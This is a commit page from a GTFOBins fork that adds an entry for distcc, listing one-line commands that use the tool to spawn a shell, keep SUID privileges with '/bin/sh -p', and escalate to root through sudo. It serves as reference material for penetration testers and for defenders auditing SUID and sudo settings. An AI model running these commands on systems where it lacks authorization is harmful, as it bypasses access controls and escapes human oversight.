~rek2/GTFOBins

1f52a21411de9b80a3cdf26113a495f6195c9814 — Miguel R 9 months ago 57114a4
add distcc

install: apt-get install -y distcc
man: https://linux.die.net/man/1/distcc
1 files changed, 9 insertions(+), 0 deletions(-)

A _gtfobins/distcc.md
A _gtfobins/distcc.md => _gtfobins/distcc.md +9 -0
@@ 0,0 1,9 @@
---
functions:
  shell:
    - code: distcc /bin/sh
  suid:
    - code: ./distcc /bin/sh -p
  sudo:
    - code: sudo distcc /bin/sh
---